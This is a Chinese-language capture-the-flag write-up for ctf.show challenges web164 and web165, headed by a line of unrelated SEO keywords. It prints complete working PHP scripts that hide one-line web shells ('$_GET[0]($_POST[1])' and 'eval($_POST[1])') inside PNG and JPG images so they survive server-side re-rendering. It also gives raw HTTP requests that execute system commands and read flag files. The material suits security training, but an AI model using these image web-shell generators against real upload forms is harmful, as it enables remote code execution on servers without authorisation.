番禺做网站哪家专业,wordpress怎么卸载,网易企业邮箱小程序,徐州建设工程交易网江苏本源web164 和 web165 的利用点都是二次渲染#xff0c;一个是 png#xff0c;一个是 jpg 目录
1、web164
2、web165 二次渲染#xff1a;
网站服务器会对上传的图片进行二次处理#xff0c;对文件内容进行替换更新#xff0c;根据原有图片生成一个新的图片#xff0c;这样… web164 和 web165 的利用点都是二次渲染一个是 png一个是 jpg 目录
1、web164
2、web165 二次渲染
网站服务器会对上传的图片进行二次处理对文件内容进行替换更新根据原有图片生成一个新的图片这样就会改变文件原有的一些内容我们需要将一句话木马插入到数据不会被改变的位置确保一句话木马不会受到二次渲染的影响。 1、web164
生成图片马
?php
$p array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img imagecreatetruecolor(32, 32);for ($y 0; $y sizeof($p); $y 3) {$r $p[$y];$g $p[$y1];$b $p[$y2];$color imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color);
}imagepng($img,./my.png);
?
#?$_GET[0]($_POST[1]);?上传图片马 这道题我最开始弄的时候老是有问题报错
Warning/b: system(): Cannot execute a blank command in b/var/www/html/upload/b62bc6b55a1f2b368380dc1fbea2e71b.png 说是没有给 system 提供参数我明明 post 传了 1ls。
有一个问题就是当你在上传图片马之后点击查看图片 这里默认的请求方式是 GET 如果你去抓这个 get 请求的包然后添加传参是不行的。
后面做了下一题发现是可以在 burpsuite 里面修改请求方式的都要使用 post 请求
稳妥点的做法
查看图片后使用 hackbar 添加参数
get 里面新增
0system
post
1ls 一定要先添加成上图所示后再使用 burpsuite 抓包重放 有时候在 mode 为 raw 下发包也可看到回显 有时候又不行了 对比下这两个请求包的差别
有回显的
POST /download.php?image8b55fd4ed5b3ea99cdab4f296c58c31e.png0system HTTP/1.1
Sec-Ch-Ua: Not/A)Brand;v8, Chromium;v126, Microsoft Edge;v126
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: Windows
Upgrade-Insecure-Requests: 1
Origin: https://12e7667e-389f-45a8-ab1a-cfc3c0a4e938.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://12e7667e-389f-45a8-ab1a-cfc3c0a4e938.challenge.ctf.show/download.php?image8b55fd4ed5b3ea99cdab4f296c58c31e.png
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Cookie: cf_clearancezOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q1ls
无回显的
POST /download.php?imagedb94064d6001c8ebbd832d00f278f83f.png0system HTTP/1.1
Sec-Ch-Ua: Not/A)Brand;v8, Chromium;v126, Microsoft Edge;v126
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: Windows
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://43c4f510-9863-431a-b391-24ee2c8482da.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6
Cookie: cf_clearancezOvseNGe7vsa2iI2sul0q..4iqncuiCpp8aVLf69f9Y-1717821963-1.0.1.1-N5r_3ciDzNeXvE8j78vzM6Uka2Tkxbx_0Jor4kyshLMGZLVImg6LN8JOObUcpFLUAVMeTbSquJsxIvNK.js70Q1ls
终于让我找到问题所在了
没有回显 添加请求头
Content-Type: application/x-www-form-urlencoded
回显正常 读取 flag
1tac flag.php ctfshow{7ee33e2a-9fb7-48b3-a089-be283761f45e} 2、web165
使用脚本生成绕过二次渲染的 jpg 图片马
?php/*The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().It is necessary that the size and quality of the initial image are the same as those of the processed image.1) Upload an arbitrary image via secured files upload script2) Save the processed image and launch:jpg_payload.php jpg_name.jpgIn case of successful injection you will get a specially crafted image, which should be uploaded again.Since the most straightforward injection method is used, the following problems can occur:1) After the second processing the injected data may become partially corrupted.2) The jpg_payload.php script outputs Somethings wrong.If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.Sergey Bobrov Black2Fan.See also:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/*/$miniPayload ?eval(\$_POST[1]);?; //注意$转义if(!extension_loaded(gd) || !function_exists(imagecreatefromjpeg)) {die(php-gd is not installed);}if(!isset($argv[1])) {die(php jpg_payload.php jpg_name.jpg);}set_error_handler(custom_error_handler);for($pad 0; $pad 1024; $pad) {$nullbytePayloadSize $pad;$dis new DataInputStream($argv[1]);$outStream file_get_contents($argv[1]);$extraBytes 0;$correctImage TRUE;if($dis-readShort() ! 0xFFD8) {die(Incorrect SOI marker);}while((!$dis-eof()) ($dis-readByte() 0xFF)) {$marker $dis-readByte();$size $dis-readShort() - 2;$dis-skip($size);if($marker 0xDA) {$startPos $dis-seek();$outStreamTmp substr($outStream, 0, $startPos) . $miniPayload . str_repeat(\0,$nullbytePayloadSize) . substr($outStream, $startPos);checkImage(_.$argv[1], $outStreamTmp, TRUE);if($extraBytes ! 0) {while((!$dis-eof())) {if($dis-readByte() 0xFF) {if($dis-readByte ! 0x00) {break;}}}$stopPos $dis-seek() - 2;$imageStreamSize $stopPos - $startPos;$outStream substr($outStream, 0, $startPos) . $miniPayload . substr(str_repeat(\0,$nullbytePayloadSize).substr($outStream, $startPos, $imageStreamSize),0,$nullbytePayloadSize$imageStreamSize-$extraBytes) . substr($outStream, $stopPos);} elseif($correctImage) {$outStream $outStreamTmp;} else {break;}if(checkImage(payload_.$argv[1], $outStream)) {die(Success!);} else {break;}}}}unlink(payload_.$argv[1]);die(Something\s wrong);function checkImage($filename, $data, $unlink FALSE) {global $correctImage;file_put_contents($filename, $data);$correctImage TRUE;imagecreatefromjpeg($filename);if($unlink)unlink($filename);return $correctImage;}function custom_error_handler($errno, $errstr, $errfile, $errline) {global $extraBytes, $correctImage;$correctImage FALSE;if(preg_match(/(\d) extraneous bytes before marker/, $errstr, $m)) {if(isset($m[1])) {$extraBytes (int)$m[1];}}}class DataInputStream {private $binData;private $order;private $size;public function __construct($filename, $order false, $fromString false) {$this-binData ;$this-order $order;if(!$fromString) {if(!file_exists($filename) || !is_file($filename))die(File not exists [.$filename.]);$this-binData file_get_contents($filename);} else {$this-binData $filename;}$this-size strlen($this-binData);}public function seek() {return ($this-size - strlen($this-binData));}public function skip($skip) {$this-binData substr($this-binData, $skip);}public function readByte() {if($this-eof()) {die(End Of File);}$byte substr($this-binData, 0, 1);$this-binData substr($this-binData, 1);return ord($byte);}public function readShort() {if(strlen($this-binData) 2) {die(End Of File);}$short substr($this-binData, 0, 2);$this-binData substr($this-binData, 2);if($this-order) {$short (ord($short[1]) 8) ord($short[0]);} else {$short (ord($short[0]) 8) ord($short[1]);}return $short;}public function eof() {return !$this-binData||(strlen($this-binData) 0);}}
?其中 test.jpg 是一张正常的 jpg 图片 运行得到 payload_test.jpg 上传该图片 调用的时候又出问题了 不传一句话直接执行命令也不行 看到网上一些师傅也说成功率很低反正我是没成功...
好吧找师傅要到了适合这道题二次渲染的 jpg 图片 一开始也没有成功后面去 B 站看了解法流程
先将这个 jpg 图片上传让服务器对其进行一次二次渲染我们下载经过二次渲染后的图片用渲染后的图片通过脚本来插入我们的 payload。
先上传原始的图片 将上传成功的图片下载
左边是原始的图片右边新下载的经过渲染后的图片注意在此之前我们都还未使用过脚本 对渲染后的图片使用脚本插入一句话木马 上传最后得到的这张图片 调用
注意使用 post 请求 使用 burpsuite 抓包
回显成功 你也可以就抓查看图片的包是 get 方式可以在 burpsuite 里切换成 post 请求 切换过去 post 里面是没有图片路径的需要手动将下面的 post 参数 image 内容移过来 读取 flag.php 拿到 flagctfshow{ed42497e-5afd-4e1a-82cd-3dfa3426091d}
